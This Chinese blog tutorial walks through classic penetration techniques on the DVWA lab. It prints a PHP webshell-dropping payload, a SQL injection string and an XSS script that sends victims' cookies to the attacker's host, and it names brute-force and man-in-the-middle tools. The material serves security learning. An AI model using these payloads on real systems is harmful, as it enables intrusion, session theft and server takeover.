网络安全2:各种经典渗透方式合集
實驗環境是 kali+owasp靶機+win10
強烈建議kali下載2018版的,不要下載新版的,新版的刪除了很多軟件。
文件上傳漏洞
文件包含
有一些主頁的php代買中包含了 include *,當上傳了一些包含能夠生成webshell(一句話木馬)的文件后,由index.php自動執行,生成木馬。
本地文件包含漏洞
1 向圖片中添加一句話病毒
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[qt]);?>')?>2. 使用owasp靶機上的dvwa頁面上傳帶有病毒代碼的圖片
3. 使用中國菜刀控制服務器
遠程文件包含
這種方式是利用服務器訪問遠程服務器中的文件(包含一句木馬生成代碼),用于在服務器中生成一句代碼的shell
1 在遠程服務器(kali)中創建文件
?2 記住文件在遠程服務器中的地址,和ip地址
在dvwa中用http://ip地址/文件名代替include
執行
3 利用中國菜刀控制服務器。
sql注入
- 對于web應用程序而言,用戶核心數據存儲在數據庫中,例如MySQL、SQL Server、Oracle;
- 通過SQL注入攻擊,可以獲取、修改、刪除數據庫信息,并且通過提權來控制web服務器等其他操作;
- SQL注入即攻擊者通過構造特殊的SQL語句,入侵目標系統,致使后臺數據庫泄露數據的過程;
搜索框的數據會傳入‘$id’的位置,一般情況下只能輸入數字,查找數字所對應的用戶的信息。
可以使用union的方式來實現查找其他數據庫。
需要注意的是,union前后的select的字段數需要是一致的,因此
1.需要知道search處的sql語句有幾個字段?
2.需要知道union后面selct的字段名稱
使用information.schema中的信息,其中TABLES表中記錄的是mysql中所有的表的信息,column存儲所有列的信息。
3 手動注入
基于布爾的注入
search處的sql為:
SELECT first_name, last_name FROM users WHERE user_id = '$id'$id處應該是id名稱,但是如果輸入處改為
select FIRST_NAME,LAST_NAME from users WHERE user_id = '' or 1=1 --'';則可以查詢表中所有信息
4??union 注入
?通過上面的方法可以獲得當前所在數據庫(好像沒啥大用)
通過上述方式可以獲得數據庫中表中列的名稱,為后續獲得數據做準備。
或得列名以后,需要注意的是,union前后的字段數量要保持一致,當后面字段很多時,可以用concat來合并多個字段。
?5 盲注
當網頁搜索對輸入的錯誤內容不提示相關信息時,需要使用盲注 sleep(5),通過延長返回結果的時間來查看是否能夠使用sql注入。
6 sqlmap 自動注入
XSS跨站腳本攻擊
最主流攻擊方式
1.xss releccted 反射型
把腳本放在鏈接里,用戶點擊鏈接后,被盜取相關信息。
2.xss stored 存儲型
把腳本放在服務器,用戶瀏覽網站就會執行腳本,被盜取信息?。
首先使用kali啟動阿帕奇服務器
systemctl restart apache2
然后編寫一段php腳本用于用戶通過xss跨站腳本訪問,目的是保存網站的cookie
?
?最后向網站注入腳本
<script> window.open('http://192.168.137.131/cookie_rec.php?cookie='+document.cookie)</script>當用戶訪問該頁面時,就會執行腳本后,訪問在服務器上的script文件,獲得cookie
無論是哪種,都需要使用到script腳本語言
?3 beef 自動化攻擊
使用kaili beef插件實現xss跨站腳本,不用進行配置
使用example在網站漏洞點進行注入,使用用戶進行訪問
可以在web ui界面進行查看被攻擊用戶,并可以進行相關操作。?
web信息收集-搜索引擎
google:在進行滲透測試之前,首先要利用一些途徑來搜索對象的一些信息,google搜索就可以很好的實現這些功能
1 site: 只在指定網站進行搜索
2 filetype:pdf/ppt/ "文件名"?
搜索pdf文件
?3 urlin:php?id=
網址中pip?id的網址(可能的注入點)
4 intitle:后臺登陸
網頁名稱叫后臺登陸的網頁(可能的注入點)
intitle:index of "parent directory" 父級目錄
5 搜索某個框架來構建的網站
shodan引擎-最可怕的搜索引擎,掃碼互聯網內包括各種硬件信息在內的各種信息
比如:ip 搜索,服務器所在國家,服務器類型,協議類型
zoomeye鐘馗之眼 國內shodan?
同樣可以獲得網絡設備的指紋
web信息收集-目標掃描工具
nmap可以獲得網站的各種指紋信息
nmap使用教程_weixin_30372371的博客-CSDN博客
漏洞掃描-awvs? -appscan? -burp suite
這些軟件都可以對上述的漏洞進行掃描,并生成報告。
SSH密碼暴力破解 海德拉密碼
海德拉是一塊密碼破解工具,可以通過設置用戶名字典,密碼字典的方式,對指定ip地址的各種服務(ftp,郵箱,ssh等)進行密碼破解工作。
?但是海德拉好像不存在設置線程的功能,破解速度比較慢
美杜莎,跟海德拉差不多,但是可以設置線程
?-t 設置線程數?
BrutesPray
集成nmap和美杜莎,使用nmap對服務器進行指紋信息搜索,美杜莎進行破解
首先使用nmap查看網段下已經啟動的服務器,保存成xml文件,然后對這些服務器進行破解
MSF框架
啟動 msfconsole
枚舉賬號模式
密碼破解防御
ARP協議實現中間人攻擊
????????基于arp協議,當主機1要訪問其他主機時,主機1會廣播尋找主機的ip地址,此時攻擊機針對主機1會偽裝成路由器,針對路由器會偽裝成主機1,此時信息會通過攻擊機。
? ? ? ? 針對客戶機:為了防止中間人攻擊,可以把路由器的地址變成靜態地址
? ? ? ? 針對服務器:使用https加密機制
總結
以上是生活随笔為你收集整理的网络安全2:各种经典渗透方式合集的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Android代码中设置横屏
- 下一篇: WebView退出时停止视频播放